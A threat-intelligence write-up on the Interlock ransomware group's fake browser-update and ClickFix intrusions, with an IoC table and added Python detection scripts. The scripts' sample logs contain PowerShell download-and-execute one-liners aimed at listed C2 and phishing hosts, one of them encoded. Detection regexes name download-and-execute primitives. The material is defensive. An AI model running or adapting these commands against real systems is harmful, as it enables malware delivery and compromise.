Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates

The Interlock ransomware intrusion set has expanded its operations across North America and Europe and refined its tradecraft along the way.

Unlike most ransomware operations, Interlock does not run as Ransomware-as-a-Service (RaaS): it operates independently, focusing on Big Game Hunting and double extortion.

Its activity has been tracked by Sekoia Threat Detection & Research (TDR) among other security firms, and their reporting documents the group’s evolving tactics and tooling.

Attack Mechanism and Execution

Interlock gains its initial foothold by compromising legitimate websites and hosting fake browser update pages on them, trading on the trust users place in those sites.

[Figure: screenshot of Interlock’s data leak site (DLS)]

Here’s how the attack unfolds:

1. Fake updater deployment:

    The initial access vector is a fake browser update hosted on compromised websites. The download poses as a Google Chrome or Microsoft Edge installer but is in fact a PyInstaller-packaged executable. When the user runs it, the executable:

    • Downloads and runs a legitimate browser installer, so the victim sees an apparently normal update.
    • Simultaneously launches a PowerShell script that acts as a backdoor.

2. PowerShell backdoor:

    The script runs in a loop, issuing HTTP requests to its command-and-control (C2) server. Two features stand out:

    • A continuous polling loop against the C2 server, so the implant can be re-tasked for as long as it is running.
    • Collection of system information, including the user context and system details, which is sent back to the attacker.

3. Command execution:

    The C2 server can issue a range of commands, including:

    • Terminating the backdoor.
    • Deploying additional malware, such as keyloggers or credential stealers (e.g., LummaStealer, BerserkStealer).
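The chain above gives a defender two behavioural handles that do not depend on file hashes: a binary named like a browser installer spawning PowerShell with scripting switches, and PowerShell polling a single host on a fixed period. The following Python is an added example, not code from Sekoia's report or from Interlock's tooling. The Sysmon-style `kind=process` / `kind=network` event format, the sample events, the process IDs and the thresholds (four connections, 20% timing jitter) are constructed for illustration; only the C2 hostname is taken from the IoC table below.

```python
"""Behavioural detection for the fake-updater -> PowerShell backdoor chain.

Hypothetical Sysmon-style telemetry (constructed sample, not real logs):
  kind=process  process creation with image, parent and cmdline
  kind=network  outbound connection from a process to dest
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# File names a user would expect a "browser update" to carry.
FAKE_INSTALLER = re.compile(r"\\(google)?(chrome|microsoftedge|edge)[^\\]*setup[^\\]*\.exe$", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
# Switches and cmdlets typical of a scripted backdoor launch, not of an installer.
SUSPICIOUS_PS = re.compile(
    r"-w(indowstyle)?\s+(hidden|1)\b|-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{40,}|"
    r"-ep\s+bypass|-executionpolicy\s+bypass|\biex\b|invoke-expression|"
    r"downloadstring|\biwr\b|invoke-webrequest|invoke-restmethod",
    re.I,
)
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample: fake ChromeSetup.exe drops a real installer and a hidden PowerShell
# backdoor, which then polls one trycloudflare host roughly once a minute.
SAMPLE_LOG = r"""
2025-03-10T09:00:00 kind=process pid=4120 ppid=2216 image="C:\Users\bob\Downloads\ChromeSetup.exe" parent="C:\Windows\explorer.exe" cmdline="C:\Users\bob\Downloads\ChromeSetup.exe"
2025-03-10T09:00:02 kind=process pid=4188 ppid=4120 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" parent="C:\Users\bob\Downloads\ChromeSetup.exe" cmdline="powershell.exe -w hidden -ep bypass -nop -c iex(iwr http://refrigerator-cheers-indicator-ferrari.trycloudflare.com/init)"
2025-03-10T09:00:03 kind=process pid=4204 ppid=4120 image="C:\Users\bob\AppData\Local\Temp\ChromeStandaloneSetup64.exe" parent="C:\Users\bob\Downloads\ChromeSetup.exe" cmdline="ChromeStandaloneSetup64.exe /silent /install"
2025-03-10T09:00:05 kind=network pid=4188 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" dest=refrigerator-cheers-indicator-ferrari.trycloudflare.com
2025-03-10T09:01:05 kind=network pid=4188 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" dest=refrigerator-cheers-indicator-ferrari.trycloudflare.com
2025-03-10T09:02:03 kind=network pid=4188 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" dest=refrigerator-cheers-indicator-ferrari.trycloudflare.com
2025-03-10T09:03:07 kind=network pid=4188 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" dest=refrigerator-cheers-indicator-ferrari.trycloudflare.com
2025-03-10T09:05:00 kind=network pid=5010 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" dest=www.powershellgallery.com
"""


def parse(log):
    """Turn '<iso timestamp> key=value ...' lines into dicts with a datetime under 'ts'."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, rest = line.split(" ", 1)
        ev = {k: (quoted or bare) for k, quoted, bare in KV.findall(rest)}
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events


def detect(events, min_beacons=4, max_jitter=0.2):
    alerts = []
    # Rule 1: a browser-installer-looking parent spawning PowerShell with backdoor-style switches.
    for ev in events:
        if ev.get("kind") != "process":
            continue
        if (FAKE_INSTALLER.search(ev.get("parent", "")) and POWERSHELL.search(ev.get("image", ""))
                and SUSPICIOUS_PS.search(ev.get("cmdline", ""))):
            alerts.append(f"fake-updater-spawned-powershell pid={ev['pid']} parent={ev['parent']}")
    # Rule 2: PowerShell connecting to one host at near-constant intervals (the C2 polling loop).
    conns = defaultdict(list)
    for ev in events:
        if ev.get("kind") == "network" and POWERSHELL.search(ev.get("image", "")):
            conns[(ev["pid"], ev["dest"].lower())].append(ev["ts"])
    for (pid, dest), times in conns.items():
        if len(times) < min_beacons:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Coefficient of variation of the gaps: a scripted loop is far more regular than a human.
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            alerts.append(f"powershell-beacon pid={pid} dest={dest} period~{mean(gaps):.0f}s")
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

Rule 2 is deliberately keyed on exact hostname plus process, not on `trycloudflare.com` as a whole: the tunnel service is legitimate and widely used, so a suffix match would drown the signal. The real installer child (pid 4204) is left alone, which is what makes the lure convincing and why rule 1 looks at the PowerShell child rather than the installer itself.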

Domain and IP Clustering for Resilience

According to Sekoia’s report, Interlock’s operators spread each backdoor C2 cluster across several hosting providers so that a takedown at one provider does not disable the cluster:

Cluster Composition

Each cluster typically includes:

• One IP from BitLaunch, a provider that accepts cryptocurrency payment.
• One IP from Hetzner Online GmbH.
• A third IP from a varying autonomous system, which further complicates disruption efforts.

ClickFix Technique for Initial Access

Around January 2025, Interlock adopted the ClickFix technique:

• Deceptive prompts: victims are talked into running malicious PowerShell commands themselves, via fake CAPTCHA verifications or fake system prompts.
• Fake installer distribution: ClickFix was used to deliver a fake installer payload, but the technique appears to have been abandoned by February 2025.
[Figure: fake Cloudflare CAPTCHA instructing the user to run a command to access a website]
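ClickFix lures in general instruct the victim to paste the planted command into the Windows Run dialog (Win+R); that delivery detail is common to the technique rather than something the article states, and Explorer records Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with a trailing "\1" on each value. The following Python, an added example that is not part of the article or the report, triages the output of `reg query` against that key for ClickFix-style one-liners, including the -EncodedCommand form. The registry dump is constructed; the two `additional-check.html` URLs in it are taken from the ClickFix IoCs below and are only matched, never fetched.

```python
"""Triage Windows Run-dialog history (RunMRU) for ClickFix-style one-liners.

Input is the text printed by
  reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Each RunMRU value is the command as typed, suffixed with "\1". Sample below is constructed.
"""
import base64
import re

INTERPRETER = re.compile(r"\b(powershell|pwsh|cmd|mshta)\b", re.I)
# Download-and-execute primitives no CAPTCHA "verification step" has any reason to invoke.
EXEC_PRIMITIVES = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"start-bitstransfer|mshta|certutil|bitsadmin|curl|wget|rundll32|regsvr32)\b", re.I)
URL = re.compile(r"""https?://[^\s"'|)]+""", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+(h(idden)?|1)\b", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# The trailing comment that dresses the command up as a CAPTCHA token for the victim.
CAPTCHA_COMMENT = re.compile(r"#.*(captcha|not a robot|verification)", re.I)
RUNMRU_LINE = re.compile(r"^\s*([a-z])\s+REG_SZ\s+(.*?)\\1\s*$", re.I)

# Constructed sample. Entry d carries its payload base64-encoded (UTF-16LE, as -EncodedCommand expects).
ENCODED_PAYLOAD = "iex (iwr https://microstteams.com/additional-check.html -UseBasicParsing)"
SAMPLE_REG_QUERY = f"""
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
    a    REG_SZ    notepad\\1
    b    REG_SZ    powershell -w hidden -c "iex (iwr https://microsoft-msteams.com/additional-check.html -UseBasicParsing)" # ''I am not a robot - reCAPTCHA Verification ID: 7281''\\1
    c    REG_SZ    mshta https://advanceipscaner.com/additional-check.html\\1
    d    REG_SZ    powershell -ep bypass -w 1 -enc {base64.b64encode(ENCODED_PAYLOAD.encode('utf-16-le')).decode()}\\1
    e    REG_SZ    \\\\fileserver\\share\\1
    MRUList    REG_SZ    dbcae
"""


def decode_encoded_command(cmd):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_command(cmd):
    """Score one Run-dialog command; three or more independent signals marks it suspicious."""
    decoded = decode_encoded_command(cmd)
    text = cmd + ("\n" + decoded if decoded else "")  # inspect the decoded form too
    reasons = []
    if INTERPRETER.search(text):
        reasons.append("interpreter")
    if EXEC_PRIMITIVES.search(text):
        reasons.append("download/exec primitive")
    if URL.search(text):
        reasons.append("remote URL")
    if HIDDEN.search(text):
        reasons.append("hidden window")
    if decoded is not None:
        reasons.append("encoded command")
    if CAPTCHA_COMMENT.search(text):
        reasons.append("CAPTCHA-themed comment")
    return {"command": cmd, "decoded": decoded, "urls": URL.findall(text),
            "reasons": reasons, "suspicious": len(reasons) >= 3}


def triage_runmru(reg_query_output):
    """Return the triage records of every suspicious RunMRU entry, in registry order."""
    hits = []
    for line in reg_query_output.splitlines():
        m = RUNMRU_LINE.match(line)
        if m:
            result = triage_command(m.group(2))
            if result["suspicious"]:
                hits.append(result)
    return hits


if __name__ == "__main__":
    for hit in triage_runmru(SAMPLE_REG_QUERY):
        print(hit["reasons"], hit["urls"])
```

Checking the decoded command as well as the raw one matters: `-enc` hides the URL and the `iex`/`iwr` pair from any rule that only inspects the literal string. The `MRUList` value gives the order the entries were used in, which is worth pulling into a timeline when a hit is confirmed.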

Interlock’s shift from fake browser updates to social-engineering tricks such as ClickFix shows an operator that changes its initial access methods quickly and has room to grow further.

With its focus on high-value targets and C2 infrastructure that blends in with legitimate hosting and tunnelling services, Interlock remains a significant threat.

Detection and response measures have to keep pace with the group’s changing tradecraft.

      Indicators of Compromise (IoC)

The following table lists the IoCs associated with Interlock’s activities. Indicators are defanged ("[.]" in place of "."); hash lists marked "additional hashes" are abridged here.

Category | Indicator type | Indicators
Fake Updater | SHA-256 | 576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296, f962e15c6efebb3c29fe399bb168066042b616affddd83f72570c979184ec55c, … (additional hashes)
ClickFix PowerShell loaders | SHA-256 | 5c697162527a468a52c9e7b7dc3257dae4ae5142db62257753969d47f1db533e, eb587b2603dfc14b420865bb862fc905cb85fe7b4b5a781a19929fc2da88eb34, … (additional hashes)
Interlock RAT | SHA-256 | 1105a3050e6c842fb9411d4f21fd6fdb119861c15f7743e244180a4e64b19b83, 299a8ef490076664675e3b52d6767bf89ddfa6accf291818c537a600a96290d2, … (additional hashes)
Keylogger | SHA-256 | 5cbc2ae758043bb58664c28f32136e9cada50a8dc36c69670ddef0a3ef6757d8, df41085a8aa9ee9da6a03db08ad910b6ef5fcdc8fee7ebb19744331c5e70c782, … (additional hashes)
BerserkStealer | SHA-256 | eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692, a5623b6a6f289bb328e4007385bdb1659407a9e825990a0faaef3625a2e782cf
LummaStealer | SHA-256 | 4672fe8b37b71be834825a2477d956e0f76f7d2016c194f1538139d21703fd6e
Windows Interlock ransomware | SHA-256 | 4a97599ff5823166112d9221d0e824af7896f6ca40cd3948ec129533787a3ea9, 33dc991e61ba714812aa536821b073e4274951a1e4a9bc68f71a802d034f4fb9, … (additional hashes)
Small autoremove DLL used by the ransomware | SHA-256 | c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
Linux Interlock ransomware | SHA-256 | 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
Data Leak Site | URL | http://ebhmkoohccl45qesdbvrjqtyro2hmhkmh6vkyfyjjzfllm3ix72aqaid[.]onion
Backdoor C2 – Cluster 1 | IP address | 23.95.182[.]59, 195.201.21[.]34, 159.223.46[.]184
Backdoor C2 – Cluster 2 | IP address | 23.227.203[.]162, 65.109.226[.]176, 65.38.120[.]47
Backdoor C2 – Cluster 3 | IP address | 216.245.184[.]181, 212.237.217[.]182, 168.119.96[.]41
Backdoor C2 – Cluster 4 | IP address | 216.245.184[.]170, 65.108.80[.]58, 84.200.24[.]41
Backdoor C2 – Cluster 5 | IP address | 206.206.123[.]65, 49.12.102[.]206, 193.149.180[.]158
Backdoor C2 – Cluster 6 | IP address | 85.239.52[.]252, 5.252.177[.]228, 80.87.206[.]189
Backdoor C2 – Cluster 7 | IP address | 65.108.80[.]58, 212.104.133[.]72, 140.82.14[.]117
Backdoor C2 – Cluster 8 | IP address | 64.94.84[.]85, 49.12.69[.]80, 96.62.214[.]11
Backdoor C2 – Cluster 9 | IP address | 177.136.225[.]153, 188.34.195[.]44, 45.61.136[.]202
Compromised URLs | URL | http://topsportracing[.]com/wp-az, http://topsportracing[.]com/az10, https://airbluefootgear[.]com/wp-includes/images/xits.php, … (additional URLs)
ClickFix URLs | URL | https://microsoft-msteams[.]com/additional-check.html, https://microstteams[.]com/additional-check.html, https://advanceipscaner[.]com/additional-check.html, … (additional URLs)
PowerShell backdoor C2 domains | Domain | refrigerator-cheers-indicator-ferrari[.]trycloudflare.com, analytical-russell-cincinnati-settings[.]trycloudflare.com, … (additional domains)
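Before the indicators above can be swept against logs they have to be refanged, normalised and de-duplicated (65.108.80[.]58, for instance, is listed under both cluster 4 and cluster 7), and the trycloudflare.com C2 domains have to be matched as exact hostnames, since the tunnel service itself is legitimate. The following Python is an added example, not part of the article or the report; it embeds a subset of the table's indicators exactly as printed and sweeps a constructed set of proxy and EDR log lines (the internal IPs, hostnames and file path in them are made up).

```python
"""Refang the indicators from the table above and sweep constructed logs for them.

Added example. Only a subset of the table is embedded; the full list loads the same way.
"""
import hashlib
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators copied verbatim (still defanged) from the table.
DEFANGED_IOCS = {
    "sha256": [
        "576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296",  # Fake Updater
        "eb1cdf3118271d754cf0a1777652f83c3d11dc1f9a2b51e81e37602c43b47692",  # BerserkStealer
    ],
    "ip": ["23.95.182[.]59", "195.201.21[.]34",
           "65.108.80[.]58", "65.108.80[.]58"],  # appears under both cluster 4 and cluster 7
    "url": ["http://topsportracing[.]com/wp-az",
            "https://microsoft-msteams[.]com/additional-check.html"],
    "domain": ["refrigerator-cheers-indicator-ferrari[.]trycloudflare.com"],
}


def refang(indicator):
    """Undo the defanging conventions used in the table ("[.]" and "hxxp")."""
    return (indicator.strip().replace("[.]", ".")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"""https?://[^\s"'<>]+""", re.I)
HOST = re.compile(r"\b[a-z0-9][a-z0-9-]*(?:\.[a-z0-9][a-z0-9-]*)+\b", re.I)
SHA256 = re.compile(r"\b[a-f0-9]{64}\b", re.I)


class IocSet:
    def __init__(self, defanged):
        self.hashes = {h.lower() for h in defanged.get("sha256", [])}
        # ip_address() raises on a malformed entry instead of silently never matching.
        self.ips = {str(ipaddress.ip_address(refang(i))) for i in defanged.get("ip", [])}
        self.urls = {refang(u) for u in defanged.get("url", [])}
        # Hostnames are matched exactly: a suffix match on trycloudflare.com would be far too broad.
        self.hosts = {refang(d).lower() for d in defanged.get("domain", [])}
        self.hosts |= {urlsplit(u).hostname for u in self.urls}

    def match_line(self, line):
        """Return (type, indicator) pairs for every indicator present in one log line."""
        hits = []
        for u in URL.findall(line):
            u = u.rstrip(".,;)")
            if u in self.urls:
                hits.append(("url", u))
        for ip in IPV4.findall(line):
            if ip in self.ips:
                hits.append(("ip", ip))
        for host in HOST.findall(line):
            if host.lower() in self.hosts:
                hits.append(("host", host.lower()))
        for digest in SHA256.findall(line):
            if digest.lower() in self.hashes:
                hits.append(("sha256", digest.lower()))
        return hits

    def match_file(self, data):
        """True if the SHA-256 of a file's bytes is one of the listed hashes."""
        return hashlib.sha256(data).hexdigest() in self.hashes


def scan(ioc, lines):
    """Return (1-based line number, hits) for every line that touches an indicator."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := ioc.match_line(line))]


# Constructed proxy and EDR lines: two true hits from the table, two look-alikes that must not fire.
SAMPLE_LOG = r"""2025-03-11 10:02:11 10.0.0.23 GET http://topsportracing.com/wp-az 200
2025-03-11 10:02:40 10.0.0.23 CONNECT 23.95.182.59:443 -
2025-03-11 10:03:01 10.0.0.44 GET https://www.microsoft.com/edge 200
2025-03-11 10:03:15 10.0.0.23 GET https://refrigerator-cheers-indicator-ferrari.trycloudflare.com/api 200
2025-03-11 10:03:20 10.0.0.51 GET https://some-other-tunnel.trycloudflare.com/x 200
2025-03-11 10:04:00 host=WS-23 event=FileCreate sha256=576d07cc8919c68914bf08663e0afd00d9f9fbf5263b5cccbded5d373905a296 path=C:\Users\bob\Downloads\ChromeSetup.exe"""

if __name__ == "__main__":
    for n, hits in scan(IocSet(DEFANGED_IOCS), SAMPLE_LOG.splitlines()):
        print(n, hits)
```

The hostnames of the listed URLs are added to the host set on purpose: the compromised sites also served other paths (the table shows `/wp-az` and `/az10` on the same host), so a visit to the bare domain during the campaign window is worth a look even when the exact URL differs.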
